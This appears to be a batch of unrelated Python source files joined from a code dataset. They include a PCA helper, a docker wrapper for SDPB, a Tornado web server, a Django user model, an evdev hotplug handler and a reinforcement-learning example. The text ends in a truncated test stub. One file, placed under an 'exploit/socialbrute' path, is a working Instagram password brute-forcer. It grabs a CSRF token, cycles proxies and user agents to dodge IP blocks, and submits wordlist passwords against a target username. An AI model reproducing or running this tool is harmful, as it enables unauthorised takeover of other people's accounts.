<filename>src/AngleMeasurement/PCASmallestEig.py import numpy as np from .PowerMethod import power_method #PCA SMALLEST EIG WITHOUT PMETH ############################################ def pca_smallest_eig(X, center=True): if center: m = np.mean(X, axis=0) cov = np.transpose(X-m)@(X-m) else: cov = np.transpose(X)@X w, v = np.linalg.eig(cov) i = np.argmin(w) return v[:, i] #PCA SMALLEST EIG W? PMETH ################################################# def pca_smallest_eig_powermethod(X, center=True): if center: m = np.mean(X, axis=0) cov = np.transpose(X-m)@(X-m)/X.shape[0] else: cov = np.transpose(X)@X/X.shape[0] lmax, v = power_method(cov) _w, v = np.linalg.eig(cov) _l, v = power_method(cov - (lmax+1)*np.eye(3)) return v.flatten()
StarcoderdataPython
40392
<gh_stars>0 import os from subprocess import CompletedProcess import docker from .sdpb import Sdpb class SdpbDocker(Sdpb): """Interface for running ``SDPB`` and related software in docker container Warning: To use this interface docker must be installed and has to be able to pull the specified image It's recommended to have at least a basic knowledge of how `docker <https://www.docker.com/>`_ works, in particular about `volumes <https://docs.docker.com/storage/volumes/>`_. By default it uses the `official docker image <https://hub.docker.com/r/wlandry/sdpb>`_ and the executable path are the ones of this docker image. Args: volume: directory that will be mounted inside the docker container, defaults to ``'.'`` which is the current directory user: user that will run the docker command, defaults to ``None`` which is the current user image: docker image of ``SDPB`` sdpb_bin: path of the ``sdpb`` binary inside the docker image pvm2sdp_bin: path of the ``pvm2sdp`` binary inside the docker image mpirun_bin: path of the ``mpirun`` binary inside the docker image unisolve_bin: path of the ``unisolve`` binary inside the docker image Attributes: volume_abs: absolute path of ``volume`` debug: flags for debugging (makes :func:`~pycftboot.sdpb.sdpb_docker.SdpbDocker.run_command` output the command to ``stdout``) """ def __init__(self, volume: str = '.', user: str = None, image: str = "wlandry/sdpb:2.5.1", sdpb_bin: str = "/usr/local/bin/sdpb", pvm2sdp_bin: str = "/usr/local/bin/pvm2sdp", mpirun_bin: str = "/usr/bin/mpirun", unisolve_bin: str = "/usr/local/bin/unisolve"): # User and docker volume stuff if user is None: user = os.getuid() self.user = f'{user}:{user}' self.volume = volume self.volume_abs = os.path.abspath(volume) os.makedirs(self.volume, exist_ok=True) self.image = image self.bin = sdpb_bin self.pvm2sdp_bin = pvm2sdp_bin self.mpirun_bin = mpirun_bin self.unisolve_bin = unisolve_bin self.debug = False super().__init__() def run_command(self, command: list) -> CompletedProcess: """Run command in the docker container specified by ``image`` This is basically a wrapper of docker API which runs equivalent command line command:: docker run -v <volume>:/work/<volume> -w /work -u <user> -d <image> <command> If the ``debug`` attribute is ``True`` it prints to ``stdout`` the ``command`` Args: command: command to run as a list """ # Print command to stdout if debug is true if self.debug: print(" ".join(command)) # Initialize docker client client = docker.from_env() container = client.containers.run( self.image, command=command, user=self.user, environment={'OMPI_ALLOW_RUN_AS_ROOT': '1', 'OMPI_ALLOW_RUN_AS_ROOT_CONFIRM': '1'}, volumes={self.volume_abs: {'bind': f'/work/{self.volume}', 'mode': 'rw'}}, working_dir='/work', detach=True ) result = container.wait() stdout = container.logs(stdout=True, stderr=False).decode("utf-8") stderr = container.logs(stdout=False, stderr=True).decode("utf-8") if result["StatusCode"] != 0: raise RuntimeError(stderr) container.remove() client.close() completed_process = CompletedProcess( args=command, returncode=result["StatusCode"], stdout=stdout, stderr=stderr ) completed_process.check_returncode() return completed_process
StarcoderdataPython
1634780
from .render_yaml import template
StarcoderdataPython
127078
<filename>exploit/socialbrute/__mainig__.py # coding=utf-8 # !/usr/bin/python from __future__ import print_function from instabrute import * import argparse import logging import random import socket import sys import threading r="\x1b[91m" w="\x1b[00m" c ="\x1b[36;1m" y="\x1b[33m" try: import urllib.request as rq from urllib.error import HTTPError import urllib.parse as http_parser except ImportError: import urllib2 as rq from urllib2 import HTTPError import urllib as http_parser try: import Queue except ImportError: import queue as Queue def check_proxy(q): """ check proxy for and append to working proxies :param q: """ if not q.empty(): proxy = q.get(False) proxy = proxy.replace("\r", "").replace("\n", "") try: opener = rq.build_opener( rq.ProxyHandler({'https': 'https://' + proxy}), rq.HTTPHandler(), rq.HTTPSHandler() ) opener.addheaders = [('User-agent', 'Mozilla/5.0')] rq.install_opener(opener) req = rq.Request('https://api.ipify.org/') if rq.urlopen(req).read().decode() == proxy.partition(':')[0]: proxys_working_list.update({proxy: proxy}) if _verbose: print(c+"[+]"+w+" Successfully connected with "+proxy) else: if _verbose: print(r+"[!]"+w+" Failed to connect with "+proxy) except Exception as err: if _verbose: print(r+"[!]"+w+" Failed to connect with "+proxy) if _debug: logger.error(err) pass def get_csrf(): """ get CSRF token from login page to use in POST requests """ global csrf_token print(y+"[+]"+w+" Trying to get CSRF token ...") try: opener = rq.build_opener(rq.HTTPHandler(), rq.HTTPSHandler()) opener.addheaders = [('User-agent', 'Mozilla/5.0')] rq.install_opener(opener) request = rq.Request('https://www.instagram.com/') try: # python 2 headers = rq.urlopen(request).info().headers except Exception: # python 3 headers = rq.urlopen(request).info().get_all('Set-Cookie') for header in headers: if header.find('csrftoken') != -1: csrf_token = header.partition(';')[0].partition('=')[2] print(c+"[+]"+w+" CSRF Token : "+csrf_token) except Exception as err: print(r+"[!]"+w+" Oops, cant get CSRF token, please try again") if _debug: logger.error(err) print("[!]"" Exiting ...") exit(3) def brute(q): """ main worker function :param word: :param event: :return: """ if not q.empty(): try: proxy = None if len(proxys_working_list) != 0: proxy = random.choice(list(proxys_working_list.keys())) word = q.get() word = word.replace("\r", "").replace("\n", "") post_data = { 'username': USER, 'password': <PASSWORD>, } header = { "User-Agent": random.choice(user_agents), 'X-Instagram-AJAX': '1', "X-CSRFToken": csrf_token, "X-Requested-With": "XMLHttpRequest", "Referer": "https://www.instagram.com/", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", 'Cookie': 'csrftoken=' + csrf_token } if proxy: if _verbose: print(y+"[-]"+w+" Password incorrect %s %s " % (word, proxy,)) opener = rq.build_opener( rq.ProxyHandler({'https': 'https://' + proxy}), rq.HTTPHandler(), rq.HTTPSHandler() ) else: if _verbose: print(y+"[-]"+w+" Password incorrect %s" % (word,)) opener = rq.build_opener( rq.HTTPHandler(), rq.HTTPSHandler() ) rq.install_opener(opener) req = rq.Request(URL, data=http_parser.urlencode(post_data).encode('ascii'), headers=header) sock = rq.urlopen(req) if sock.read().decode().find('"authenticated": true') != -1: print(c+"\n[+]"+w+" Successful exploitation") print(w+" Username: "+y, USER) print(w+" Password: "+y, word) found_flag = True q.queue.clear() q.task_done() except HTTPError as e: if e.getcode() == 400 or e.getcode() == 403: if e.read().decode("utf8", 'ignore').find('"checkpoint_required"') != -1: print(c+"\n[!]"+w+" Successfully login, but checkpoint") print("") print(r+"[!]"+w+" Username: "+y, USER) print(r+"[!]"+w+" Password: "+y, word) print("") found_flag = True q.queue.clear() q.task_done() return elif proxy: print(r+"[!] Error:"+w+" Proxy IP %s now is blocked by instagram" % (proxy,)) if proxy in proxys_working_list: proxys_working_list.pop(proxy) print(c+"[+]"+w+" Online Proxy: ", str(len(proxys_working_list))) else: print(r+"[!] Error:"+w+" Your IP now is blocked by instagram") print(r+"[!]"+w+" Please use Proxy or VPN App") else: print(r+"[!]"+w+" Error:", e.getcode()) q.task_done() return except Exception as err: if _debug: print(r+"[!]"+w+" Problems in the proxy connection") logger.error(err) else: print(r+"[!]"+w+" Problems in the proxy connection") pass return def starter(): """ threading workers initialize """ global found_flag queue = Queue.Queue() threads = [] max_thread = THREAD found_flag = False queuelock = threading.Lock() print(y+"\n[-]"+w+" Preparing for attack ...") print(c+"[!]"+w+" Bruteforce is running\n") try: for word in words: queue.put(word) while not queue.empty(): queuelock.acquire() for workers in range(max_thread): t = threading.Thread(target=brute, args=(queue,)) t.setDaemon(True) t.start() threads.append(t) for t in threads: t.join() queuelock.release() if found_flag: break print("") print(y+"[!]"+w+" Bruteforce attack completed") except Exception as err: print(err) def check_avalaible_proxys(proxys): """ check avalaible proxyies from proxy_list file """ socket.setdefaulttimeout(30) global proxys_working_list print(y+"[-]"+w+" Try connecting with a proxy list ...\n") proxys_working_list = {} max_thread = THREAD queue = Queue.Queue() queuelock = threading.Lock() threads = [] for proxy in proxys: queue.put(proxy) while not queue.empty(): queuelock.acquire() for workers in range(max_thread): t = threading.Thread(target=check_proxy, args=(queue,)) t.setDaemon(True) t.start() threads.append(t) for t in threads: t.join() queuelock.release() print(c+"[+]"+w+" Successfully connected with "+ str(len(proxys_working_list))+" proxy") if __name__ == "__main__": parser = argparse.ArgumentParser( description="Instagram BruteForcer", epilog="./instabrute -u user_test -w words.txt -p proxys.txt -t 4 -d -v" ) # required argument parser.add_argument('-u', '--username', action="store", required=True, help='Target Username') parser.add_argument('-w', '--word', action="store", required=True, help='Words list path') parser.add_argument('-p', '--proxy', action="store", required=True, help='Proxy list path') # optional arguments parser.add_argument('-t', '--thread', help='Thread', type=int, default=4) parser.add_argument('-v', '--verbose', action='store_const', help='Thread', const=True, default=False) parser.add_argument('-d', '--debug', action='store_const', const=True, help='Debug mode', default=False) args = parser.parse_args() URL = "https://www.instagram.com/accounts/login/ajax/" USER = args.username THREAD = args.thread _verbose = args.verbose _debug = args.debug user_agents = ["Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko)", "Mozilla/5.0 (Linux; U; Android 2.3.5; en-us; HTC Vision Build/GRI40) AppleWebKit/533.1", "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko)", "Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201", "Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0", "Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))"] try: words = open(args.word).readlines() except IOError: print("[-]"" Error: Check your word list file path\n") sys.exit(1) try: proxys = open(args.proxy).readlines() except IOError: print("[-]"" Error: Check your proxy list file path\n") sys.exit(1) # enable debugging if its set if _debug: # Logging stuff logging.basicConfig(level=logging.DEBUG, filename="log", format='%(asctime)s - %(name)s - %(levelname)s - %(message)s') logger = logging.getLogger(__name__) print(y+"[-]"+w+" Starting bruteforce attack to", USER) print(y+"[-]"+w+" List of words found on file", str(len(words))) print(y+"[-]"+w+" List of proxy found on proxys.txt", str(len(proxys))) check_avalaible_proxys(proxys) get_csrf() starter()
StarcoderdataPython
3242980
# Licensed to the Apache Software Foundation (ASF) under one or more # contributor license agreements. See the NOTICE file distributed with # this work for additional information regarding copyright ownership. # The ASF licenses this file to You under the Apache License, Version 2.0 # (the "License"); you may not use this file except in compliance with # the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import os import ConfigParser import importlib import logging import sys import pkg_resources import tornado.web import webservice.algorithms_spark.NexusCalcSparkHandler from tornado.options import define, options, parse_command_line from webservice import NexusHandler from webservice.nexus_tornado.request.handlers import NexusRequestHandler def inject_args_in_config(args, config): """ Takes command argparse arguments and push them in the config with syntax args.<section>-<option> """ log = logging.getLogger(__name__) for t_opt in args._options.values(): n = t_opt.name first_ = n.find('_') if first_ > 0: s, o = n[:first_], n[first_+1:] v = t_opt.value() log.info('inject argument {} = {} in configuration section {}, option {}'.format(n, v , s, o)) if not config.has_section(s): config.add_section(s) config.set(s, o, v) return config if __name__ == "__main__": logging.basicConfig( level=logging.DEBUG, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', datefmt="%Y-%m-%dT%H:%M:%S", stream=sys.stdout) log = logging.getLogger(__name__) webconfig = ConfigParser.RawConfigParser() webconfig.readfp(pkg_resources.resource_stream(__name__, "config/web.ini"), filename='web.ini') algorithm_config = ConfigParser.RawConfigParser() algorithm_config.readfp(pkg_resources.resource_stream(__name__, "config/algorithms.ini"), filename='algorithms.ini') define("debug", default=False, help="run in debug mode") define("port", default=webconfig.get("global", "server.socket_port"), help="run on the given port", type=int) define("address", default=webconfig.get("global", "server.socket_host"), help="Bind to the given address") define('solr_time_out', default=60, help='time out for solr requests in seconds, default (60) is ok for most deployments' ' when solr performances are not good this might need to be increased') parse_command_line() algorithm_config = inject_args_in_config(options, algorithm_config) moduleDirs = webconfig.get("modules", "module_dirs").split(",") for moduleDir in moduleDirs: log.info("Loading modules from %s" % moduleDir) importlib.import_module(moduleDir) staticDir = webconfig.get("static", "static_dir") staticEnabled = webconfig.get("static", "static_enabled") == "true" log.info("Initializing on host address '%s'" % options.address) log.info("Initializing on port '%s'" % options.port) log.info("Starting web server in debug mode: %s" % options.debug) if staticEnabled: log.info("Using static root path '%s'" % staticDir) else: log.info("Static resources disabled") handlers = [] log.info("Running Nexus Initializers") NexusHandler.executeInitializers(algorithm_config) max_request_threads = webconfig.getint("global", "server.max_simultaneous_requests") log.info("Initializing request ThreadPool to %s" % max_request_threads) request_thread_pool = tornado.concurrent.futures.ThreadPoolExecutor(max_request_threads) spark_context = None for clazzWrapper in NexusHandler.AVAILABLE_HANDLERS: if issubclass(clazzWrapper, webservice.algorithms_spark.NexusCalcSparkHandler.NexusCalcSparkHandler): if spark_context is None: from pyspark.sql import SparkSession spark = SparkSession.builder.appName("nexus-analysis").getOrCreate() spark_context = spark.sparkContext handlers.append( (clazzWrapper.path, NexusRequestHandler, dict(clazz=clazzWrapper, algorithm_config=algorithm_config, sc=spark_context, thread_pool=request_thread_pool))) else: handlers.append( (clazzWrapper.path, NexusRequestHandler, dict(clazz=clazzWrapper, thread_pool=request_thread_pool))) class VersionHandler(tornado.web.RequestHandler): def get(self): self.write(pkg_resources.get_distribution("nexusanalysis").version) handlers.append((r"/version", VersionHandler)) if staticEnabled: handlers.append( (r'/(.*)', tornado.web.StaticFileHandler, {'path': staticDir, "default_filename": "index.html"})) app = tornado.web.Application( handlers, default_host=options.address, debug=options.debug ) app.listen(options.port) log.info("Starting HTTP listener...") tornado.ioloop.IOLoop.current().start()
StarcoderdataPython
1605119
""" Module Name: Preprocessing Module Source Path: modules/preprocessing.py Description: This python module contains a concrete class which manages the creation of the project's data system. It is made to support the initialization of many different regions' covid/income data, but only has the city of Toronto implemented. This class also is in charge of calling the regression module onto a certain region. """ from modules import data_loading as dl from modules.config import TorontoConfig from modules.entities import * from modules.regression import ExponentialRegressionModel class PreprocessingSystem: """ Class to manage all preprocessing of data for a model. Instance Attributes: - regions: a dictionary mapping the name of a region to an instance of a Region. """ regions: dict[str: SuperRegion] def __init__(self) -> None: self.regions = {} def init_toronto_model(self) -> None: """ Initialise classes for toronto model. """ config = TorontoConfig() print('[modules.preprocessing] Generating Toronto Model') data_loading_system = dl.DataLoadingToronto(config.start_date, config.end_date) self.regions['Toronto'] = data_loading_system.load_super_region(config.paths['regions']) neighbourhoods = data_loading_system.load_sub_regions(config.paths['regions'], self.regions['Toronto']) for neighbourhood in neighbourhoods.values(): self.regions['Toronto'].add_sub_region(neighbourhood) neighbourhood_cases = data_loading_system.load_covid_cases(config.paths['cases'], neighbourhood) for case in neighbourhood_cases.values(): neighbourhood.add_covid_case(case) self.regions['Toronto'].update_economic_scaling() self.regions['Toronto'].update_case_scaling() self.toronto_model_regression() def toronto_model_regression(self) -> None: """ Generates exponential regression model for toronto data. """ print('[modules.preprocessing] Generating Toronto regression model') config = TorontoConfig() coordinates = [(neighbourhood.scaled_economic_index, neighbourhood.scaled_case_index) for neighbourhood in self.regions['Toronto'].neighbourhoods.values()] self.regions['Toronto'].regression_model = ExponentialRegressionModel(coordinates, config.regression['angle_divisor']) if __name__ == '__main__': import python_ta.contracts python_ta.contracts.DEBUG_CONTRACTS = False python_ta.contracts.check_all_contracts() import doctest doctest.testmod(verbose=True) import python_ta python_ta.check_all(config={ 'extra-imports': ['modules.regression', 'modules.data_loading', 'modules.entities', 'modules.config'], 'allowed-io': [], 'max-line-length': 100, 'disable': ['R1705', 'C0200'] })
StarcoderdataPython
4807162
from functools import partial from django.contrib.auth.models import AbstractUser from django.db import models from django.utils.crypto import get_random_string import uuid make_stream_key = partial(get_random_string, 20) class CustomUser(AbstractUser): pass # add additional fields in here uid = models.UUIDField(default=uuid.uuid4, editable=False, unique=True) channels = models.TextField(blank=True) privs = models.TextField(blank=True) subs = models.TextField(blank=True) def __str__(self): return self.username class Channel(models.Model): cid = models.UUIDField(primary_key=True, default=uuid.uuid4, unique=True) title = models.CharField(max_length=255) slug = models.SlugField(unique=True, max_length=255) vods = models.TextField(blank=True) moderators = models.ManyToManyField(CustomUser, related_name="moderators") streamkey = models.UUIDField(default=uuid.uuid4, unique=True) creator = models.ForeignKey(CustomUser, on_delete=models.CASCADE) is_live= models.BooleanField(default=False)
StarcoderdataPython
1741295
<gh_stars>10-100 from rltf.schedules.schedule import Schedule from rltf.schedules.const_schedule import ConstSchedule from rltf.schedules.exponential_decay import ExponentialDecay from rltf.schedules.linear_schedule import LinearSchedule from rltf.schedules.piecewise_schedule import PiecewiseSchedule
StarcoderdataPython
1681758
<gh_stars>10-100 import asyncio from time import sleep import evdev import pyinotify from ev_core.config import Config from utils.evdevutils import EvDevUtils from utils.langutils import * class EventHandler(pyinotify.ProcessEvent): """ This is the central core ouf our hotplugging we basically use the linux input event system to detect whether all needed devices are plugged in and stop and/or shut our engine down until this state is reached or whenever this state is broken see also https://www.saltycrane.com/blog/2010/04/monitoring-filesystem-python-and-pyinotify/ https://github.com/gvalkov/python-evdev/issues/99 Thanks for everyone on the net for gathering this info """ def __init__(self, config: Config, get_available_devices:callable=None, pevent=None, **kargs): super().__init__(pevent, **kargs) self._get_available_devices = get_available_devices self.devices = [] self.matched = {} self.matched_paths = {} self._matched_devices = {} self.config = config self.all = len(config.orig_data["inputs"]) == 0 self.init_if_plugged_in() def reset(self): self.devices = [] self.matched = {} self.matched_paths = {} self._matched_devices = {} def init_if_plugged_in(self): if self.all: return print("scanning for source devices") # wait 2 seconds for the nodes to catch up # sometimes some subdevices need a little bit of time # to have their nodes created sleep(2) devices = self.get_available_devices() for device in devices: self.handle_match(device, device.path) """ Gets all available devices which are bound to the evdev api from linux """ def get_available_devices(self): if self._get_available_devices is not None: devices = self._get_available_devices() else: devices = EvDevUtils.get_available_devices() devices.sort(key=lambda dev: save_fetch(lambda: dev.fd, "-"), reverse=True) return devices """ event handler for the creation function every time a node is created it is matched against our matcher to see whether a new usable device was plugged in which can be processed by our rules engine """ def process_IN_CREATE(self, event): if self.all or event.dir or not event.name.startswith("event"): return asyncio.ensure_future(self.match_device2()) async def match_device2(self): await asyncio.sleep(2) self.init_if_plugged_in() async def match_device(self, event): # we have to retry until the device is unlocked by the generation event # after 10 tries we give up save_call(lambda: self.event_match(event)) def event_match(self, event): dev = evdev.InputDevice(event.pathname) self.handle_match(dev, event.pathname) """ Match processing method matches a device against our device rules configuration """ def handle_match(self, dev, pathname): matched, input_dev_key = self._device_match(dev) if matched: self.matched_paths[pathname] = True dev.__dict__["_input_dev_key_"] = input_dev_key self.devices.append(dev) print(" - " + dev.name + " found ") if len(self.devices) == len(self.config.inputs): print("all devices found") self.all = True print("Following devices were found:") for device in self.devices: print(" - " + device.name) self.config.event_emitter.emit("handler_start") """ handle delete, whenever a matched device is unplugged we need to shut the system entirely down and wait until all the matched devices are plugged back in for the time being it is an all or nothing approach """ def process_IN_DELETE(self, event): if event.dir: return if not event.name.startswith("event"): return if event.pathname not in self.matched_paths: return if self.all: asyncio.ensure_future(self.cleanup()) async def cleanup(self): # again we wait a little bit so that # all nodes are unlocked after the linux event await asyncio.sleep(0.5) self.config.event_emitter.emit("handler_stop") self.all = False self.matched = {} self.matched_paths = {} self._matched_devices = {} """ Complex device match, it basically first checks for a full name or phys match and if not found tries a re match for name or phys also takes the rel device position into consideration which is the relativ device in multiple matches """ def _device_match(self, device: evdev.InputDevice): for key in save_fetch(lambda: self.config.inputs, {}): name, name_re, phys, phys_re, rel_pos, vendor, product, exclusive, i_max, i_min, i_deadzone = self.config.get_config_input_params(key) device_match_string = str(self.config.inputs[key]) found = Config.full_match(device, name, name_re, phys, phys_re, vendor, product) if found: if exclusive: try: device.grab() except Exception as e: print(e) pass if save_fetch(lambda: self._matched_devices[device_match_string], False) is True: return False, None accessor_key = name or phys or name_re or phys_re or vendor or product already_processed = save_fetch(lambda: self.matched[accessor_key], 1) if already_processed == rel_pos: self._matched_devices[device_match_string] = True return True, key else: self.matched[accessor_key] = already_processed + 1 return False, None class SourceDevices2: """ A device holder class determines the devices in the input devices section and then stores the ones which match from the inputs section of the config """ def __init__(self, config: Config): self.watch_manager = pyinotify.WatchManager() self.loop = asyncio.get_event_loop() # first we need to initially search self.handler = EventHandler(config, self.get_available_devices) # second we start an internal watchdog for hotplugging self.notifier = pyinotify.AsyncioNotifier(self.watch_manager, self.loop, default_proc_fun=self.handler) self.watch_manager.add_watch('/dev/input', pyinotify.IN_CREATE | pyinotify.IN_DELETE, rec=True, auto_add=True) # unless all devices are checked in we do not process any further with the basic initialisation ## asyncio.set_event_loop(self.loop) ##asyncio.run(self.awaiter()) def get_available_devices(self): devices = EvDevUtils.get_available_devices() devices.sort(key=lambda dev: save_fetch(lambda: dev.fd, "-"), reverse=True) return devices async def awaiter(self): while not self.handler.all: await asyncio.sleep(3) @property def all_found(self): return self.handler.all @property def devices(self): return self.handler.devices def close(self): for device in self.devices: try: device.ungrab() except Exception as e: pass device.close() self.handler.reset()
StarcoderdataPython
1754971
# -*- coding: utf-8 -*- """ Created on Mon May 18 20:14:16 2020 @author: dilayerc """ # Practice # Return the number of times that the string "hi" appears anywhere in the given string. # Examples: ## count_hi('abc hi ho') → 1 ## count_hi('ABChi hi') → 2 ## count_hi('hihi') → 2 # Answer def count_hi(string): return string.count('hi') # Tests print(count_hi('abc hi ho')) # correct output print(count_hi('ABChi hi')) # correct output print(count_hi('hihi')) # correct output
StarcoderdataPython
35621
<gh_stars>1-10 class BaseNode: pass class Node(BaseNode): def __init__(self, offset, name=None, **opts): self.offset = offset self.end_offset = None self.name = name self.nodes = [] self.opts = opts def __as_dict__(self): return {"name": self.name, "nodes": [node.__as_dict__() for node in self.nodes]} class Token(BaseNode): def __init__(self, offset, value): self.offset = offset self.value = value def __as_dict__(self): return {"offset": self.offset, "value": self.value} class NodeInspector: def __init__(self, target): if not isinstance(target, Node): raise TypeError("target should be an instance of Node, not " + target.__class__) self.target = target self.names = {} self.values = [] for node in target.nodes: if isinstance(node, Node): if node.name in self.names: self.names[node.name] += [node] else: self.names[node.name] = [node] else: self.values.append(node) if target.opts.get("flatten"): if target.opts.get("as_list"): if len(self.names) >= 1: nodes = list(self.names.values())[0] else: nodes = [] self.mask = [NodeInspector(node).mask for node in nodes] elif len(self.names) >= 1: nodes = list(self.names.values())[0] self.mask = NodeInspector(nodes[0]).mask else: self.mask = None # elif len(self.names) == 0 and len(self.values) == 1: # self.mask = self.values[0] else: self.mask = NodeMask(self) class NodeMask: def __init__(self, inspector): super().__setattr__("_inspector", inspector) super().__setattr__("_offset", inspector.target.offset) super().__setattr__("_end_offset", inspector.target.end_offset) super().__setattr__("_name", inspector.target.name) def __str__(self): target = self._inspector.target n = target.name v = len(self._inspector.values) s = ", ".join(("{}[{}]".format(k, len(v)) for k,v in self._inspector.names)) return "<NodeMask name={}; values=[{}], nodes=[{}]>".format(n, v, s) def __getattr__(self, name): names = self._inspector.names nodes = names.get(name) if nodes: node = NodeInspector(nodes[0]).mask else: node = None return node def __setattr__(self, name, value): raise AttributeError def __getitem__(self, i): return self._inspector.values[i] def __len__(self): return len(self._inspector.values) def __iter__(self): return iter(self._inspector.values) def __as_dict__(self): return self._inspector.target.__as_dict__()
StarcoderdataPython
1604018
import sys from functools import partial from blaze.data import CSV, JSON from blaze.utils import tmpfile, raises from blaze.data.utils import tuplify from blaze.compatibility import xfail import gzip is_py2_win = sys.platform == 'win32' and sys.version_info[:2] < (3, 0) @xfail(is_py2_win, reason='Win32 py2.7 unicode/gzip/eol needs sorting out') def test_gzopen_csv(): with tmpfile('.csv.gz') as filename: f = gzip.open(filename, 'wt') f.write('1,1\n2,2') f.close() # Not a valid CSV file assert raises(Exception, lambda: list(CSV(filename, schema='2 * int'))) dd = CSV(filename, schema='2 * int', open=partial(gzip.open, mode='rt')) assert tuplify(list(dd)) == ((1, 1), (2, 2)) @xfail(is_py2_win, reason='Win32 py2.7 unicode/gzip/eol needs sorting out') def test_gzopen_json(): with tmpfile('.json.gz') as filename: f = gzip.open(filename, 'wt') f.write('[[1, 1], [2, 2]]') f.close() # Not a valid JSON file assert raises(Exception, lambda: list(JSON(filename, schema='2 * int'))) dd = JSON(filename, schema='2 * int', open=gzip.open) assert tuplify(list(dd)) == ((1, 1), (2, 2))
StarcoderdataPython
3319376
<gh_stars>100-1000 #!/usr/bin/env python3 """ Simple example of using cherry to solve cartpole. The code is an adaptation of the PyTorch reinforcement learning example. TODO: This is not reinforce, this is policy gradient. """ import random import gym import numpy as np from itertools import count import torch as th import torch.nn as nn import torch.nn.functional as F import torch.optim as optim from torch.distributions import Categorical import cherry as ch import cherry.envs as envs SEED = 567 GAMMA = 0.99 RENDER = False random.seed(SEED) np.random.seed(SEED) th.manual_seed(SEED) class PolicyNet(nn.Module): def __init__(self): super(PolicyNet, self).__init__() self.affine1 = nn.Linear(4, 128) self.affine2 = nn.Linear(128, 2) def forward(self, x): x = F.relu(self.affine1(x)) action_scores = self.affine2(x) return F.softmax(action_scores, dim=1) def update(replay): policy_loss = [] # Discount and normalize rewards rewards = ch.discount(GAMMA, replay.reward(), replay.done()) rewards = ch.normalize(rewards) # Compute loss for sars, reward in zip(replay, rewards): log_prob = sars.log_prob policy_loss.append(-log_prob * reward) # Take optimization step optimizer.zero_grad() policy_loss = th.stack(policy_loss).sum() policy_loss.backward() optimizer.step() if __name__ == '__main__': env = gym.make('CartPole-v0') env = envs.Logger(env, interval=1000) env = envs.Torch(env) env.seed(SEED) policy = PolicyNet() optimizer = optim.Adam(policy.parameters(), lr=1e-2) running_reward = 10.0 replay = ch.ExperienceReplay() for i_episode in count(1): state = env.reset() for t in range(10000): # Don't infinite loop while learning mass = Categorical(policy(state)) action = mass.sample() old_state = state state, reward, done, _ = env.step(action) replay.append(old_state, action, reward, state, done, # Cache log_prob for later log_prob=mass.log_prob(action)) if RENDER: env.render() if done: break # Compute termination criterion running_reward = running_reward * 0.99 + t * 0.01 if running_reward > env.spec.reward_threshold: print('Solved! Running reward is now {} and ' 'the last episode runs to {} time steps!'.format(running_reward, t)) break # Update policy update(replay) replay.empty()
StarcoderdataPython
1624427
# -*- coding: utf-8 -*- """ github4.api =========== :copyright: (c) 2012-2014 by <NAME> :license: Modified BSD, see LICENSE for more details """ from .github import GitHub from .github import GitHubEnterprise gh = GitHub() def login(username=None, password=None, token=None, two_factor_callback=None): """Construct and return an authenticated GitHub session. .. note:: To allow you to specify either a username and password combination or a token, none of the parameters are required. If you provide none of them, you will receive ``None``. :param str username: login name :param str password: password for the login :param str token: OAuth token :param func two_factor_callback: (optional), function you implement to provide the Two-factor Authentication code to GitHub when necessary :returns: :class:`GitHub <github4.github.GitHub>` """ g = None if (username and password) or token: g = GitHub() g.login(username, password, token, two_factor_callback) return g def enterprise_login( username=None, password=<PASSWORD>, token=None, url=None, two_factor_callback=None, ): """Construct and return an authenticated GitHubEnterprise session. .. note:: To allow you to specify either a username and password combination or a token, none of the parameters are required. If you provide none of them, you will receive ``None``. :param str username: login name :param str password: <PASSWORD> the login :param str token: OAuth token :param str url: URL of a GitHub Enterprise instance :param func two_factor_callback: (optional), function you implement to provide the Two-factor Authentication code to GitHub when necessary :returns: :class:`GitHubEnterprise <github4.github.GitHubEnterprise>` """ if not url: raise ValueError( "GitHub Enterprise requires you provide the URL of" " the instance" ) g = None if (username and password) or token: g = GitHubEnterprise(url) g.login(username, password, token, two_factor_callback) return g
StarcoderdataPython
1510
#!/usr/bin/env python from distutils.core import setup setup(name='Mimik', version='1.0', description='Python framework for markov models', author='<NAME>', author_email='<EMAIL>', url='https://www.python.org/sigs/distutils-sig/', packages=['distutils', 'distutils.command'], )
StarcoderdataPython
3384199
<reponame>anamileva/gridpath<filename>tests/project/capacity/capacity_types/test_gen_new_lin.py # Copyright 2016-2020 Blue Marble Analytics LLC. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from __future__ import print_function from builtins import str from collections import OrderedDict from importlib import import_module import os.path import sys import unittest from tests.common_functions import create_abstract_model, \ add_components_and_load_data TEST_DATA_DIRECTORY = \ os.path.join(os.path.dirname(__file__), "..", "..", "..", "test_data") # Import prerequisite modules PREREQUISITE_MODULE_NAMES = [ "temporal.operations.timepoints", "temporal.operations.horizons", "temporal.investment.periods", "geography.load_zones", "project"] NAME_OF_MODULE_BEING_TESTED = \ "project.capacity.capacity_types.gen_new_lin" IMPORTED_PREREQ_MODULES = list() for mdl in PREREQUISITE_MODULE_NAMES: try: imported_module = import_module("." + str(mdl), package='gridpath') IMPORTED_PREREQ_MODULES.append(imported_module) except ImportError: print("ERROR! Module " + str(mdl) + " not found.") sys.exit(1) # Import the module we'll test try: MODULE_BEING_TESTED = import_module("." + NAME_OF_MODULE_BEING_TESTED, package='gridpath') except ImportError: print("ERROR! Couldn't import module " + NAME_OF_MODULE_BEING_TESTED + " to test.") class TestGenNewLin(unittest.TestCase): """ """ def 